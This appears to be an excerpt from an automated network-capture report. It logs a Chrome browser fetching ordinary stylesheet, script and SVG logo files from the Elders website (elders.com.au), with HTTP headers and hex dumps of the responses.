                                                                                                                                                                                                            2024-11-06 05:29:44 UTC615OUTGET /etc.clientlibs/el/clientlibs/clientlib-base.lc-de3a13856264e0a5f9a3056f8dca43c3-lc.min.css HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Fri, 20 Sep 2024 04:22:44 GMT
                                                                                                                                                                                                            etag: W/"1f3e2-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770066-PAO
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1726809879.252773,VS0,VS0,VE1
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 481244
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b005681ae76a-DFW
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC759INData Raw: 37 64 33 63 0d 0a 2e 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 0a 2e 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 0a 2e 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 70 61 6e 65 6c 2d 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 2e 63 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 5f 5f 70 61 6e 65 6c 2d 2d 65 78 70 61 6e 64 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 0a 2e 63 6d 70 2d 74 61 62 73 5f 5f 74 61 62 6c 69 73 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a
                                                                                                                                                                                                            Data Ascii: 7d3c.cmp-accordion__header{margin:0}.cmp-accordion__button{display:block;width:100%;text-align:left}.cmp-accordion__panel--hidden{display:none}.cmp-accordion__panel--expanded{display:block}.cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 0a 2e 63 6d 70 2d 63 61 72 6f 75 73 65 6c 5f 5f 69 6e 64 69 63 61 74 6f 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6c 65 78 3a 30 20 31 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 70 78 3b 68 65 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 37 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 33 30 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 29 7d 0a 2e 63 6d 70 2d 63 61 72 6f 75 73 65 6c 5f 5f 69 6e
                                                                                                                                                                                                            Data Ascii: p;justify-content:center;margin:0;padding:0;list-style:none}.cmp-carousel__indicator{position:relative;flex:0 1 auto;width:10px;height:10px;margin:0 7px;border-radius:50%;font-size:0;text-indent:-3000px;background-color:rgba(0,0,0,0.5)}.cmp-carousel__in
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 79 5a 58 4e 6c 63 6e 5a 6c 49 6a 34 4e 43 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 32 4e 7a 49 73 4d 45 4d 30 4d 44 59 75 4f 54 41 7a 4c 44 41 73 4d 54 6b 79 4c 44 49 78 4e 43 34 35 4d 44 4d 73 4d 54 6b 79 4c 44 51 34 4d 47 4d 77 4c 44 6b 31 4c 6a 63 73 4d 6a 67 75 4d 44 45 78 4c 44 45 34 4e 43 34 34 4e 54 55 73 4e 7a 59 75 4d 6a 63 31 4c 44 49 31 4f 53 34 33 4d 6a 56 44 4d 54 67 78 4c 6a 59 30 4e 69 77 34 4d 6a 59 75 4d 7a 55 30 4c 44 51 34 4c 6a 41 33 4e 53 77 35 4e 54 6b 75 4f 54 49 31 4c 44 4d 32 4c 44 6b 33 4d 67 30 4b 43 57 4d 74 4d 54 67 73 4d 54 67 74 4d 7a 59 73 4d 7a 59 74 4d 7a 59 73 4e 7a 4a 7a 4d 54 67 73 4e 54 51 73 4d 7a 59 73 4e 7a 4a 7a 4d 7a 59 75 4d 44 45 79 4c 44 4d 32 4c 44 63 79 4c 44 4d 32 63 7a 55 30 4c 54 45 34 4c 44 63 79 4c 54
                                                                                                                                                                                                            Data Ascii: yZXNlcnZlIj4NCjxwYXRoIGQ9Ik02NzIsMEM0MDYuOTAzLDAsMTkyLDIxNC45MDMsMTkyLDQ4MGMwLDk1LjcsMjguMDExLDE4NC44NTUsNzYuMjc1LDI1OS43MjVDMTgxLjY0Niw4MjYuMzU0LDQ4LjA3NSw5NTkuOTI1LDM2LDk3Mg0KCWMtMTgsMTgtMzYsMzYtMzYsNzJzMTgsNTQsMzYsNzJzMzYuMDEyLDM2LDcyLDM2czU0LTE4LDcyLT
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 42 46 65 48 42 76 63 6e 51 67 55 47 78 31 5a 79 31 4a 62 69 41 75 49 46 4e 57 52 79 42 57 5a 58 4a 7a 61 57 39 75 4f 69 41 32 4c 6a 41 77 49 45 4a 31 61 57 78 6b 49 44 41 70 49 43 41 74 4c 54 34 4e 43 6a 77 68 52 45 39 44 56 46 6c 51 52 53 42 7a 64 6d 63 67 55 46 56 43 54 45 6c 44 49 43 49 74 4c 79 39 58 4d 30 4d 76 4c 30 52 55 52 43 42 54 56 6b 63 67 4d 53 34 78 4c 79 39 46 54 69 49 67 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 64 7a 4d 75 62 33 4a 6e 4c 30 64 79 59 58 42 6f 61 57 4e 7a 4c 31 4e 57 52 79 38 78 4c 6a 45 76 52 46 52 45 4c 33 4e 32 5a 7a 45 78 4c 6d 52 30 5a 43 49 2b 44 51 6f 38 63 33 5a 6e 49 48 5a 6c 63 6e 4e 70 62 32 34 39 49 6a 45 75 4d 53 49 67 61 57 51 39 49 6b 78 68 65 57 56 79 58 7a 45 69 49 48 68 74 62 47 35 7a 50 53 4a 6f 64
                                                                                                                                                                                                            Data Ascii: BFeHBvcnQgUGx1Zy1JbiAuIFNWRyBWZXJzaW9uOiA2LjAwIEJ1aWxkIDApICAtLT4NCjwhRE9DVFlQRSBzdmcgUFVCTElDICItLy9XM0MvL0RURCBTVkcgMS4xLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL0dyYXBoaWNzL1NWRy8xLjEvRFREL3N2ZzExLmR0ZCI+DQo8c3ZnIHZlcnNpb249IjEuMSIgaWQ9IkxheWVyXzEiIHhtbG5zPSJod
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 76 69 65 77 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 68 65 69 67 68 74 3a 35 30 30 70 78 7d 0a 2e 70 64 66 76 69 65 77 65 72 3a 6e 6f 74 28 2e 63 71 2d 45 64 69 74 61 62 6c 65 2d 64 6f 6d 29 20 2e 63 6d 70 2d 70 64 66 76 69 65 77 65 72 5f 5f 66 75 6c 6c 2d 77 69 6e 64 6f 77 2d 62 6f 72 64 65 72 6c 65 73 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 39 7d 0a 2e 70 64 66 76 69 65 77 65 72 2e 63 71 2d 45 64 69 74 61 62 6c 65 2d 64 6f 6d 20 2e 63 6d 70 2d 70 64 66 76 69 65 77 65 72 5f 5f 66 75 6c 6c 2d 77 69 6e 64 6f 77 2d 62 6f 72 64 65 72 6c 65 73 73 7b 68 65 69 67 68 74 3a 35 30 30 70 78 7d 0a 2e 61 65 6d 2d 47
                                                                                                                                                                                                            Data Ascii: viewer__content{height:500px}.pdfviewer:not(.cq-Editable-dom) .cmp-pdfviewer__full-window-borderless{height:100vh;position:fixed;width:100vw;top:0;left:0;z-index:9999}.pdfviewer.cq-Editable-dom .cmp-pdfviewer__full-window-borderless{height:500px}.aem-G
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 6f 6e 65 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 33 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 32 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 36 36 37 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 33 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 33 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 33 3e 2e 61 65
                                                                                                                                                                                                            Data Ascii: one;width:33.33333333%}.aem-Grid.aem-Grid--3>.aem-GridColumn.aem-GridColumn--default--2{float:left;clear:none;width:66.66666667%}.aem-Grid.aem-Grid--3>.aem-GridColumn.aem-GridColumn--default--3{float:left;clear:none;width:100%}.aem-Grid.aem-Grid--3>.ae
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 65 6d 2d 47 72 69 64 2d 2d 34 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 6f 66 66 73 65 74 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 35 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 31 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 32 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 35 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 32 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63
                                                                                                                                                                                                            Data Ascii: em-Grid--4>.aem-GridColumn.aem-GridColumn--offset--default--4{margin-left:100%}.aem-Grid.aem-Grid--5>.aem-GridColumn.aem-GridColumn--default--1{float:left;clear:none;width:20%}.aem-Grid.aem-Grid--5>.aem-GridColumn.aem-GridColumn--default--2{float:left;c
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 33 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 35 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 36 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 36 36 37 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 36 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 35 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 38 33
                                                                                                                                                                                                            Data Ascii: dColumn--default--3{float:left;clear:none;width:50%}.aem-Grid.aem-Grid--6>.aem-GridColumn.aem-GridColumn--default--4{float:left;clear:none;width:66.66666667%}.aem-Grid.aem-Grid--6>.aem-GridColumn.aem-GridColumn--default--5{float:left;clear:none;width:83
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 64 2d 2d 37 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 35 37 2e 31 34 32 38 35 37 31 34 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 37 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 35 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 37 31 2e 34 32 38 35 37 31 34 33 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 37 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61
                                                                                                                                                                                                            Data Ascii: d--7>.aem-GridColumn.aem-GridColumn--default--4{float:left;clear:none;width:57.14285714%}.aem-Grid.aem-Grid--7>.aem-GridColumn.aem-GridColumn--default--5{float:left;clear:none;width:71.42857143%}.aem-Grid.aem-Grid--7>.aem-GridColumn.aem-GridColumn--defa
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 32 35 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 38 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 33 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 33 37 2e 35 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 38 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2d 2d 64 65 66 61 75 6c 74 2d 2d 34 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 35 30 25 7d 0a 2e 61 65 6d 2d 47 72 69 64 2e 61 65 6d 2d 47 72 69 64 2d 2d 38 3e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e 2e 61 65 6d 2d 47 72 69 64 43 6f 6c 75 6d 6e
                                                                                                                                                                                                            Data Ascii: 25%}.aem-Grid.aem-Grid--8>.aem-GridColumn.aem-GridColumn--default--3{float:left;clear:none;width:37.5%}.aem-Grid.aem-Grid--8>.aem-GridColumn.aem-GridColumn--default--4{float:left;clear:none;width:50%}.aem-Grid.aem-Grid--8>.aem-GridColumn.aem-GridColumn


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            45192.168.2.457717162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC608OUTGET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC598INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 29 Feb 2024 03:45:04 GMT
                                                                                                                                                                                                            etag: W/"0-2386f26fb1bdc0"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Age: 486839
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210161-DFW
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1709578051.675756,VS0,VS0,VE1
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0056dcbddae-DFW


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            46192.168.2.457710162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC620OUTGET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC619INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:44 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            content-disposition: attachment; filename="el-logo-2.svg"
                                                                                                                                                                                                            last-modified: Tue, 22 Nov 2022 06:53:39 GMT
                                                                                                                                                                                                            etag: W/"ebc-5ee09a1ba22c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-sjc10059-SJC
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730827446.433406,VS0,VS0,VE424
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0057f8f0c13-DFW
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC750INData Raw: 65 62 63 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 36 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 36 20 32 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 2e 31 32 34 31 20 39 2e 33 37 36 37 43 37 33 2e 39 31 30 39 20 39 2e 30 31 38 30 31 20 37 33 2e 31 31 39 37 20 38 2e 39 38 36 33 36 20 37 32 2e 32 30 31 38 20 38 2e 39 39 36 39 31 43 37 31 2e 31 32 35 37 20 39 2e 30 31 38 30 31 20 37 30 2e 32 31 38 34 20 39 2e 32 35 30 31 31 20 36 39 2e 34 38 20 39 2e 36 34 30 34 35 43 36 38 2e 35 35 31 36 20 39 2e 30 37 30 37 36 20 36 37 2e 34 39 36 36 20 38 2e 39 30 31 39 36 20 36 36 2e
                                                                                                                                                                                                            Data Ascii: ebc<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 37 2e 32 35 37 34 20 34 38 2e 39 33 39 34 20 31 37 2e 31 39 34 31 43 34 39 2e 31 35 30 34 20 31 37 2e 31 36 32 35 20 34 39 2e 32 39 38 31 20 31 37 2e 31 30 39 37 20 34 39 2e 34 31 34 31 20 31 37 2e 30 37 38 31 43 35 33 2e 30 35 33 38 20 31 35 2e 37 38 30 35 20 35 34 2e 34 30 34 32 20 31 33 2e 37 37 36 20 35 34 2e 38 30 35 31 20 31 33 2e 30 35 38 36 43 35 35 2e 33 34 33 32 20 31 32 2e 31 30 39 31 20 35 35 2e 34 35 39 32 20 31 30 2e 38 33 32 36 20 35 34 2e 35 39 34 31 20 39 2e 38 39 33 36 35 43 35 33 2e 36 36 35 37 20 38 2e 39 30 31 39 36 20 35 30 2e 36 30 36 33 20 38 2e 32 31 36 32 32 20 34 36 2e 39 31 33 38 20 31 30 2e 38 33 32 36 43 34 34 2e 35 36 31 32 20 31 32 2e 34 39 39 35 20 34 32 2e 35 33 35 36 20 31 34 2e 37 36 37 37 20 34 32 2e 30 37 31 34 20 31
                                                                                                                                                                                                            Data Ascii: 7.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677 42.0714 1
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC1369INData Raw: 32 35 2e 33 37 31 20 33 2e 34 37 39 33 34 43 32 36 2e 35 31 30 34 20 32 2e 34 34 35 34 36 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 43 32 37 2e 33 39 36 36 20 31 2e 32 33 32 32 32 20 32 37 2e 31 33 32 39 20 30 2e 35 38 38 36 38 32 20 32 36 2e 34 34 37 31 20 30 2e 34 37 32 36 33 33 43 32 33 2e 35 35 36 35 20 2d 30 2e 30 33 33 37 35 39 34 20 32 31 2e 37 36 33 20 2d 30 2e 30 31 32 36 35 39 38 20 31 39 2e 39 33 37 39 20 30 2e 30 30 38 34 33 39 38 37 43 31 36 2e 34 37 37 35 20 30 2e 30 36 31 31 38 39 31 20 31 32 2e 38 34 38 34 20 31 2e 32 39 35 35 32 20 31 31 2e 30 32 33 32 20 32 2e 38 31 34 37 43 39 2e 31 38 37 35 38 20 34 2e 33 34 34 34 33 20 38 2e 34 33 38 35 33 20 36 2e 38 37 36 33 39 20 39 2e 38 39 34
                                                                                                                                                                                                            Data Ascii: 25.371 3.47934C26.5104 2.44546 27.0485 1.64367 27.0485 1.64367C27.3966 1.23222 27.1329 0.588682 26.4471 0.472633C23.5565 -0.0337594 21.763 -0.0126598 19.9379 0.00843987C16.4775 0.0611891 12.8484 1.29552 11.0232 2.8147C9.18758 4.34443 8.43853 6.87639 9.894
                                                                                                                                                                                                            2024-11-06 05:29:44 UTC291INData Raw: 30 36 20 31 30 2e 30 39 34 31 43 37 35 2e 36 34 31 31 20 39 2e 38 35 31 34 35 20 37 35 2e 34 38 32 38 20 39 2e 35 32 34 34 20 37 35 2e 30 38 31 39 20 39 2e 34 30 38 33 35 4d 33 35 2e 39 36 33 31 20 31 33 2e 38 31 38 32 43 33 30 2e 38 33 35 39 20 31 39 2e 35 30 34 36 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 43 32 38 2e 32 35 31 32 20 31 36 2e 35 39 32 38 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 43 33 35 2e 37 30 39 39 20 31 30 2e 31 35 37 34 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 43 33 37 2e 31 32 33 36 20 31 32 2e 37 39 34 39 20 33 35 2e 39 37 33 36 20 31 33 2e 38 31 38 32 20 33 35 2e 39 37
